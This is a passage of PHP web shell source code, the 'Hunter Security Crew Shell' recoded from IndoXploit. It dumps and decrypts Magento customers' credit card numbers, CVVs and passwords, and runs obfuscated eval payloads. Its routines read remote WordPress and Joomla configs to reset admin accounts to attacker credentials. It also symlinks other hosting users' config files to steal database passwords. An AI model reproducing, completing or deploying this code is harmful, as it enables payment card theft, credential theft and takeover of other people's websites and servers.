  758. $query = mysql_query("SELECT sfo.updated_at,sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_enc,CONCAT(sfo.cc_exp_month,' |',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' |-| ',billing.email) AS 'Billing Address' FROM sales_flat_quote_payment AS sfo JOIN sales_flat_quote_address AS billing ON billing.quote_id = sfo.quote_id AND billing.address_type = 'billing'");
  759. $query2 = mysql_query("SELECT sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_status,CONCAT(sfo.cc_exp_month,'|',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' | ',billing.email) AS 'Billing Address' FROM sales_flat_order_payment AS sfo JOIN sales_flat_order_address AS billing ON billing.parent_id = sfo.parent_id AND billing.address_type = 'billing' where cc_number_enc != ''");
  760. if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0){
  761. echo'<br><br>
  762. ====================================================================<br>
  763. [ Credit Card ] <br>
  764. ====================================================================<br>';
  765. echo "
  766. <table border='1' align='left' >
  767. <tr>
  768. <td>no</td>
  769. <td>Date</td>
  770. <td>Credit Owner</td>
  771. <td>method</td>
  772. <td>Credit Number</td>
  773. <td>Credit Exp</td>
  774. <td>CVV</td>
  775. <td>Address</td>
  776. </tr>";
  777. $no = 1;
  778. $batas = 0;
  779. while($vx = mysql_fetch_array($query)){
  780. $date = $vx['updated_at'];
  781. $cc_owner = $vx['cc_owner'];
  782. $method = $vx['method'];
  783. $cc_number_enc = $crypto->decrypt($vx['cc_number_enc']);
  784. $exp = $vx['exp'];
  785. $cc_cid_enc = $crypto->decrypt($vx['cc_cid_enc']);
  786. $Billing_Address = $vx['Billing Address'];
  787. echo "<tr><pre><td>$no</td><td>$date</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_enc</td><td>$Billing_Address</td></pre></tr>";
  788. $batas = $no++;
  789. }
  790.  
  791. while($vx2 = mysql_fetch_array($query2)){
  792. $batas +=1;
  793. $cc_owner = $vx2['cc_owner'];
  794. $method = $vx2['method'];
  795. $cc_number_enc = $crypto->decrypt($vx2['cc_number_enc']);
  796. $exp = $vx2['exp'];
  797. $cc_cid_status = $crypto->decrypt($vx2['cc_cid_status']);
  798. $Billing_Address = $vx2['Billing Address'];
  799. echo "<tr><pre><td>$batas</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_status</td><td>$Billing_Address</td></pre></tr>";
  800. $batas++;
  801. }
  802.  
  803. echo "</table><br>";
  804. }
  805. //=========================================================================================================
  806. $query = mysql_query("SELECT email,value FROM customer_entity_varchar, customer_entity WHERE customer_entity_varchar.entity_id = customer_entity.entity_id and attribute_id=12");
  807. $query2 = mysql_query("SELECT customer_email,password_hash FROM sales_flat_quote");
  808.  
  809.  
  810. if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0 ){
  811. if (!$query){
  812. echo "<center><b>Gagal</b></center>";
  813. }else{
  814. echo'<br><br>
  815. ====================================================================<br>
  816. [ Customer ] <br>
  817. ====================================================================<br>';
  818. }
  819. echo "
  820. <table border='1' align='center' >
  821. <tr>
  822. <td>no</td>
  823. <td>user</td>
  824. <td>pass</td>
  825. </tr>";
  826. $no = 1;
  827. $batas = 0;
  828. while($vx = mysql_fetch_array($query)) {
  829. $user = $vx['email'];
  830. $pass = $vx['value'];
  831. echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";
  832. $batas = $no++;
  833. }
  834.  
  835. if(mysql_num_rows($query2) != 0 && ($query2)){
  836. while($vx2 = mysql_fetch_array($query2)){
  837. $user = $vx2['customer_email'];
  838. $pass = $crypto->decrypt($vx2['password_hash']);
  839. if(!empty($user) && !empty($pass)){ //tampilin ketika datanya itu ada klo gk ada ya jangan di tampilkan
  840. $batas +=1;
  841. echo "<tr><pre><td>$batas</td><td>$user</td><td>$pass</td></pre></tr>";
  842. $batas++;
  843. }
  844. }
  845. }
  846.  
  847. echo "</table><br>";
  848. }
  849. //=========================================================================================================
  850. }
  851. }
  852. function save($format,$data){
  853. $fp = fopen($format, 'a');
  854. fwrite($fp, $data);
  855. fclose($fp);
  856. }
  857. function cekbase64($string){
  858. $decoded = base64_decode($string, true);
  859. if (!preg_match('/^[a-zA-Z0-9\/\r\n+]*={0,2}$/', $string)) return false;
  860. if(!base64_decode($string, true)) return false;
  861. if(base64_encode($decoded) != $string) return false;
  862. return true;//nilai return 1 jika true
  863. }
  864. //----untuk decode password ---/
  865. class Varien_Crypt_Mcrypt{
  866. /**
  867. * Constuctor
  868. *
  869. * @param array $data
  870. */
  871. public function __construct()
  872. {
  873. }
  874.  
  875. /**
  876. * Initialize mcrypt module
  877. *
  878. * @param string $key cipher private key
  879. * @return Varien_Crypt_Mcrypt
  880. */
  881. public function init($key)
  882. {
  883. $this->handler = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, '');
  884. $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($this->handler), MCRYPT_RAND);
  885. $maxKeySize = mcrypt_enc_get_key_size($this->handler);
  886.  
  887. if (iconv_strlen($key, 'UTF-8')>$maxKeySize) {
  888. //throw new Varien_Exception('Maximum key size must should be smaller '.$maxKeySize);
  889. return null;
  890. }
  891.  
  892. mcrypt_generic_init($this->handler, $key, $iv);
  893.  
  894. return $this;
  895. }
  896.  
  897. /**
  898. * Encrypt data
  899. *
  900. * @param string $data source string
  901. * @return string
  902. */
  903. public function encrypt($data)
  904. {
  905. if (!$this->handler) {
  906. //throw new Varien_Exception('Crypt module is not initialized.');
  907. return null;
  908. }
  909. if (strlen($data) == 0) {
  910. return $data;
  911. }
  912. return base64_encode(mcrypt_generic($this->handler, $data));
  913. }
  914.  
  915. /**
  916. * Decrypt data
  917. *
  918. * @param string $data encrypted string
  919. * @return string
  920. */
  921. public function decrypt($data)
  922. {
  923. if (!$this->handler) {
  924. //throw new Varien_Exception('Crypt module is not initialized.');
  925. return null;
  926. }
  927. if (strlen($data) == 0) {
  928. return $data;
  929. }
  930. return mdecrypt_generic($this->handler, base64_decode($data));
  931. }
  932.  
  933.  
  934. /**
  935. * Desctruct cipher module
  936. *
  937. */
  938. public function __destruct()
  939. {
  940. if ($this->handler) {
  941. $this->_reset();
  942. }
  943. }
  944.  
  945. protected function _reset()
  946. {
  947. mcrypt_generic_deinit($this->handler);
  948. mcrypt_module_close($this->handler);
  949. }
  950. }
  951. }
  952. elseif($_GET['do'] == 'zip') {
  953. echo "<center><h1>Zip Menu</h1>";
  954. function rmdir_recursive($dir) {
  955. foreach(scandir($dir) as $file) {
  956. if ('.' === $file || '..' === $file) continue;
  957. if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file");
  958. else unlink("$dir/$file");
  959. }
  960. rmdir($dir);
  961. }
  962. if($_FILES["zip_file"]["name"]) {
  963. $filename = $_FILES["zip_file"]["name"];
  964. $source = $_FILES["zip_file"]["tmp_name"];
  965. $type = $_FILES["zip_file"]["type"];
  966. $name = explode(".", $filename);
  967. $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
  968. foreach($accepted_types as $mime_type) {
  969. if($mime_type == $type) {
  970. $okay = true;
  971. break;
  972. }
  973. }
  974. $continue = strtolower($name[1]) == 'zip' ? true : false;
  975. if(!$continue) {
  976. $message = "Its Not Zip";
  977. }
  978. $path = dirname(__FILE__).'/';
  979. $filenoext = basename ($filename, '.zip');
  980. $filenoext = basename ($filenoext, '.ZIP');
  981. $targetdir = $path . $filenoext;
  982. $targetzip = $path . $filename;
  983. if (is_dir($targetdir)) rmdir_recursive ( $targetdir);
  984. mkdir($targetdir, 0777);
  985. if(move_uploaded_file($source, $targetzip)) {
  986. $zip = new ZipArchive();
  987. $x = $zip->open($targetzip);
  988. if ($x === true) {
  989. $zip->extractTo($targetdir);
  990. $zip->close();
  991.  
  992. unlink($targetzip);
  993. }
  994. $message = "<b>Sukses</b>";
  995. } else {
  996. $message = "<b>Error</b>";
  997. }
  998. }
  999. echo '<table style="width:100%" border="1">
  1000. <tr><td><h2>Upload And Unzip</h2><form enctype="multipart/form-data" method="post" action="">
  1001. <label>Zip File : <input type="file" name="zip_file" /></label>
  1002. <input type="submit" name="submit" value="Upload And Unzip" />
  1003. </form>';
  1004. if($message) echo "<p>$message</p>";
  1005. echo "</td><td><h2>Zip Backup</h2><form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/cox_backup.zip' style='width: 450px;' height='10'><br><input type='submit' name='backup' value='BackUp!' style='width: 215px;'></form>";
  1006. if($_POST['backup']){
  1007. $save=$_POST['save'];
  1008. function Zip($source, $destination)
  1009. {
  1010. if (extension_loaded('zip') === true)
  1011. {
  1012. if (file_exists($source) === true)
  1013. {
  1014. $zip = new ZipArchive();
  1015.  
  1016. if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
  1017. {
  1018. $source = realpath($source);
  1019.  
  1020. if (is_dir($source) === true)
  1021. {
  1022. $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
  1023.  
  1024. foreach ($files as $file)
  1025. {
  1026. $file = realpath($file);
  1027.  
  1028. if (is_dir($file) === true)
  1029. {
  1030. $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
  1031. }
  1032.  
  1033. else if (is_file($file) === true)
  1034. {
  1035. $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
  1036. }
  1037. }
  1038. }
  1039.  
  1040. else if (is_file($source) === true)
  1041. {
  1042. $zip->addFromString(basename($source), file_get_contents($source));
  1043. }
  1044. }
  1045.  
  1046. return $zip->close();
  1047. }
  1048. }
  1049.  
  1050. return false;
  1051. }
  1052. Zip($_POST['dir'],$save);
  1053. echo "Done , Save To <b>$save</b>";
  1054. }
  1055. echo "</td><td><h2>Unzip Manual</h2><form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br><input type='text' name='dir' value='$dir/file.zip' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/cox_unzip' style='width: 450px;' height='10'><br><input type='submit' name='extrak' value='Unzip!' style='width: 215px;'></form>";
  1056. if($_POST['extrak']){
  1057. $save=$_POST['save'];
  1058. $zip = new ZipArchive;
  1059. $res = $zip->open($_POST['dir']);
  1060. if ($res === TRUE) {
  1061. $zip->extractTo($save);
  1062. $zip->close();
  1063. echo 'Succes , Location : <b>'.$save.'</b>';
  1064. } else {
  1065. echo 'Gagal Mas :( Ntahlah !';
  1066. }
  1067. }
  1068. echo '</tr></table>';
  1069. }
  1070. elseif($_GET['do'] == 'shellchk') {
  1071. eval(str_rot13(gzinflate(str_rot13(base64_decode(('vUddQtswFH1epf4HcCE1VUxbNvEwdSMGd9FeJtGhPaygyLZ5B6jc5AaHORP/fdf5IoXxsBeiSbGdZu491z6+cTiA1GVPdCkwDTIaDnM5lyVupoT5Nc1ymWWmWpZdRm9FXWOGqzguTlue4Utjpa+p53a411OCIcKZFCxqGVUES63F8XGSylAx3jr+oATX45SXE3LBubGwAsM16RLpY5Jlp+aHh1RR8jscWaPZpI0dzbay/hdZJJqkziiFUZV5t5ohSmIE1POy0M+Bl+381rjEL1whj5xmh/kwvC85oifDTp6wqlXyADr2ynAJKJgpiEaeTrCvLaDIA/J0OCD47FswS6Yi85pEzzrYVoNF2ujEg0OX0jJ1duvpWlW+hORmhxQIElNvPuS/inBksxEA98JsNaPjRIiU9civj2FpYL5jhElwWdN8KmUSZ3fm5NNn2pVFMWILSHUuPTFerhbfSYs1Xax+nV2s4u+Xl4slegNI6MckWBxvdmiUx6SRWHUftOXZ5jWmD/Gi9qAUbdMVvKPKP6elKVxA1QayIrWnG3A59y6ibiMjrDMd9OI+9UfcyU9QsvB3W5VwT4eDHam5xc85F8ACd40q3EvfeMxADe3HzatgAcLD58AhwYNoyOxJDvqc5pYhhrOHCO8Y097nXM6vJACLfvCEct6IWaMfGxj5VXOGSwk5Opai4J5n72gj0Wfza+sM+x29+D6bR5eFWaK2xCcCQcELBxy9Y8DbOjFY2nF26JjF88lC3zmYZHEJ8hYkTFaJFtp7j3dpzPvfdKxZKYx9j1CWkFJfuSbvZMzDAf78MRdXgQ724/Oz5cVtR7dA7BK95oW9TvX6id8rrLYhYIaupzSEqntthpHSeYK2aXmfYEWLxqojGkjH3mRJcryqge1uN6CvYvgbLZdJJPqPi928ml2vNqHd+yU4Q6botthiDsI//AU='))))));
  1072. } elseif($_GET['do'] == 'loghunter')
  1073. {eval(str_rot13(gzinflate(str_rot13(base64_decode(("tUl7YtpVEP87VXyHiZMr0BLsPJqqgJ14QyBquuNrXEUlEExeeL2E5hZ7wS5pmu9+s7ZWgDM5RCmWJXt0f7Pz3JnJ52lphOsTQ+odbjFOjaGl1CCfWIlGTyPgLguIpQ+VoQKRYD7x8N8mDhsqC/iZRJ9DoxtDqNYDyx4xYA+20BUmvjEF7mw4wlL9WZ8J5o69b6lpcyhg8Qipju+aXkAVo35z+/az5KVGhoozmlEBilhLltbJyVCl6WULvpDx7kNE11lDpQ14NJsKY9hQKEyligc8DHNJFU8xcrXUKgRGV6hWhVooC6xMRCshRH2fz31OLQCfKtyQGVyNpOOg+DflE+hSPAhY+VyXsxRlZ6p3x+qRaWsK2sfqx3B13OZmN4E1QrZ9xuyqqkG5KyaEzCsuidTJdfbJEWEGzOYOE5PAim4j1fEJ/eSOSz7XHm5cqFE2n3bv1XwO4jeYFvfNxmyzNSgkrivclR7zuenIilALjFRpEM65SNzHY2A0nGubQ8Fdv+igZpH2sgfcAblAO6Vpj8lUPkUQYezqhVcB3r2DxaJFKL2AlvDykRjQbmRtpXt90eu0zi/+MJu9U/uijb8VuUxbclBEsBs45k+zkpS3K6iYBVLFaBylnOgI0hRL5Y3FQXRZfmiYBqEwMTNal2AkLeYk59Uya4KEVgfxLZhvd2PP9Djjmxm+i3WCbKyD0jm/ely2bV0lC8ZrMI/PSC4dTjskikOPWSQKiiRBlYk2KBQLancWQQZPKjtVNbgbxDLisK9w5ZNcjAFea4uBWE9P9T1a6/e7mtFxb8YtIi+SxYw7S8EcHX4+7R8bVxyhipKCcTHI0urpvyS8ijMz4sz1Wh6GxcLeoH3wp2nwmR/8RjF/+WNj9+FKVsElEitlvUooy9iV913ikmym133XiZ2pQbgjQUJZQrjEE5mO2peRjLGrIc0EvygbVDwqA/c8J+SOLzB2Q6kSJp0MzIZnS+ZUHcuQxS8P5vT/2KW2meKRHbey2DEnkutEuHe1GtDBZRMI6HD2F8rxaCjBjx+QTxpKDfidRgsLX/VsOyt7Mm/6IohStil49uKEetKv3+73D0KMWDsk3BP0jfIvrUvo8YG21e3o94+7mnP8FXTYGyqXptOW2vVBNe2kdNwiZh+r/Ns6D/N6WPV+vrTAT8slKBWe8WvLrREPoeMLav70RqakveP7ZuvYcdErllZIvvJ77rg0sNlJhj1PnYNCxUdCm/1rPK6MLByKKpbARIhG7ES6OQm5NTdvM7826yo34HbLiMVo85WApX0fXpBkw5+LB9CNtD7hkLPex0rFQBHbKs5S5j2nxQVCGfrXN63ehflb++a622H1zN56+/qm9OpMGzw9o09LDyIMydh1CsuTqb6lvxOKR6yiefbiK97cQF4lre4/idARGdaujmDr5XvpxPQXP/guZC3mu3GcxgGvFiMWRjD2jvXBa3biz+dp/gU="))))));}
  1074. elseif($_GET['do'] == 'metu') {
  1075.  
  1076.  
  1077. echo '<form action="?dir=$dir&do=metu" method="post">';
  1078. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  1079. echo 'Byee !';
  1080.  
  1081. }
  1082. elseif($_GET['do'] == 'about') {
  1083.  
  1084. echo '<center>Hunter Security Crew Shell<hr>IndoXploit Shell Recoded By Hunter Security Crew<br>For More Script Visit <a href="#">Here</a>';
  1085.  
  1086. }
  1087. elseif($_GET['do'] == 'auto_cu_wp') {
  1088. if($_POST['gass']) {
  1089. echo "<center><h1>WordPress Auto Change User 2</h1>
  1090. <form method='post'>
  1091. Link Config: <br>
  1092. <textarea name='link' style='width: 450px; height:250px;'>";
  1093. UrlLoop($_POST['linkconf'],'wordpress');
  1094. echo"</textarea><br>
  1095. <input type='submit' style='width: 450px;' name='auto_cu_wp' value='Hajar!!'>
  1096. </form></center>";
  1097. } else {
  1098. echo "<center><h1>WordPress Auto Change User 2</h1>
  1099. <form method='post'>
  1100. Link Config: <br>
  1101. <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/Symconf/'><br>
  1102. <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
  1103. </form></center>";
  1104. }
  1105. if($_POST['auto_cu_wp']) {
  1106.  
  1107. function anucurl($sites) {
  1108. $ch = curl_init($sites);
  1109. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1110. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1111. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1112. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1113. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1114. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1115. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1116. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1117. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1118. $data = curl_exec($ch);
  1119. curl_close($ch);
  1120. return $data;
  1121. }
  1122. $link = explode("\r\n", $_POST['link']);
  1123. $user = "hscrew";
  1124. $pass = "hscrew";
  1125. $passx = md5($pass);
  1126. foreach($link as $dir_config) {
  1127. $config = anucurl($dir_config);
  1128. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1129. $dbuser = ambilkata($config,"DB_USER', '","'");
  1130. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1131. $dbname = ambilkata($config,"DB_NAME', '","'");
  1132. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1133. $prefix = $dbprefix."users";
  1134. $option = $dbprefix."options";
  1135. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1136. $db = mysql_select_db($dbname);
  1137. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1138. $result = mysql_fetch_array($q);
  1139. $id = $result[ID];
  1140. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1141. $result2 = mysql_fetch_array($q2);
  1142. $target = $result2[option_value];
  1143. if($target == '') {
  1144. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1145. } else {
  1146. echo "<font color=blue>[</font> $target <font color=blue>]</font></font><br>";
  1147. }
  1148. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1149. if(!$conn OR !$db OR !$update) {
  1150. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1151. mysql_close($conn);
  1152. } else {
  1153. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1154. echo "[+] username: <font color=lime>$user</font><br>";
  1155. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1156.  
  1157. mysql_close($conn);
  1158. }
  1159. }
  1160. }
  1161.  
  1162. }
  1163. elseif($_GET['do'] == 'auto_cu_joomla') {
  1164. if($_POST['gass']) {
  1165. echo "<center><h1>Joomla Auto Change User 2</h1>
  1166. <form method='post'>
  1167. Link Config: <br>
  1168. <textarea name='link' style='width: 450px; height:250px;'>";
  1169. UrlLoop($_POST['linkconf'],'joomla');
  1170. echo"</textarea><br>
  1171. <input type='submit' style='width: 450px;' name='auto_cu_joomla' value='Hajar!!'>
  1172. </form></center>";
  1173. } else {
  1174. echo "<center><h1>Joomla Auto Change User 2</h1>
  1175. <form method='post'>
  1176. Link Config: <br>
  1177. <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/Symconf/'><br>
  1178. <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
  1179. </form></center>";
  1180. }
  1181. if($_POST['auto_cu_joomla']) {
  1182.  
  1183. function anucurl($sites) {
  1184. $ch = curl_init($sites);
  1185. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1186. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1187. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1188. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1189. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1190. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1191. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1192. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1193. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1194. $data = curl_exec($ch);
  1195. curl_close($ch);
  1196. return $data;
  1197. }
  1198. $link = explode("\r\n", $_POST['link']);
  1199. $user = "hscrew";
  1200. $pass = "hscrew";
  1201. $passx = md5($pass);
  1202. foreach($link as $dir_config) {
  1203. $config = anucurl($dir_config);
  1204. $dbhost = ambilkata($config,"host = '","'");
  1205. $dbuser = ambilkata($config,"user = '","'");
  1206. $dbpass = ambilkata($config,"password = '","'");
  1207. $dbname = ambilkata($config,"db = '","'");
  1208. $dbprefix = ambilkata($config,"dbprefix = '","'");
  1209. $prefix = $dbprefix."users";
  1210. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1211. $db = mysql_select_db($dbname);
  1212. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1213. $result = mysql_fetch_array($q);
  1214. $id = $result['id'];
  1215. $site = ambilkata($config,"sitename = '","'");
  1216. $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
  1217. echo "Config => ".$dir_config."<br>";
  1218. echo "CMS => Joomla<br>";
  1219. if($site == '') {
  1220. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1221. } else {
  1222. echo "Sitename => $site<br>";
  1223. }
  1224. if(!$update OR !$conn OR !$db) {
  1225. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1226. } else {
  1227. echo "Status => Done , Username : <font color=lime>$user</font> Password : <font color=lime>$pass</font><br><br>";
  1228. }
  1229. mysql_close($conn);
  1230. }
  1231. }
  1232. }
  1233. elseif($_GET['do'] == 'symconfig') {
  1234. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  1235. echo '<script>alert("Skid this won\'t work on Windows")</script>';
  1236. exit;
  1237. }
  1238. else
  1239. {
  1240. if($_POST["m"] && !$_POST["passwd"]==""){
  1241. @mkdir("Symconf", 0777);
  1242. @chdir("Symconf");
  1243. @symlink("/","root");
  1244. $htaccess="Options Indexes FollowSymLinks
  1245. DirectoryIndex jancox.htm
  1246. AddType text/plain .php
  1247. AddHandler text/plain .php
  1248. Satisfy Any";
  1249. @file_put_contents(".htaccess",$htaccess);
  1250. $etc_passwd=$_POST["passwd"];
  1251. $etc_passwd=explode("\n",$etc_passwd);
  1252. foreach($etc_passwd as $passwd){
  1253. $pawd=explode(":",$passwd);
  1254. $user =$pawd[0];
  1255.  
  1256. @symlink('/','Symconf/root');
  1257. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1258. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1259. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1260. @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1261. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1262. @symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1263. @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1264. @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1265. @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1266. @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1267. @symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1268. @symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1269. @symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1270. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1271. @symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1272. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1273. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1274. @symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1275. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1276. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1277. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1278. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1279. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1280. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1281. @symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1282. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1283. @symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1284. @symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1285. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1286. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1287. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1288. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1289. @symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1290. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1291. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1292. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1293. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1294. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1295. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1296. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1297. @symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1298. @symlink('/home/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1299. @symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1300. @symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1301. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1302. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1303. @symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1304. @symlink('/home/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1305. @symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1306. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1307. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1308. @symlink('/home/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1309. @symlink('/home/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1310. @symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1311. @symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1312. @symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1313. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1314. @symlink('/home/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1315. @symlink('/home/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1316. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1317. @symlink('/home/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1318. @symlink('/home/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
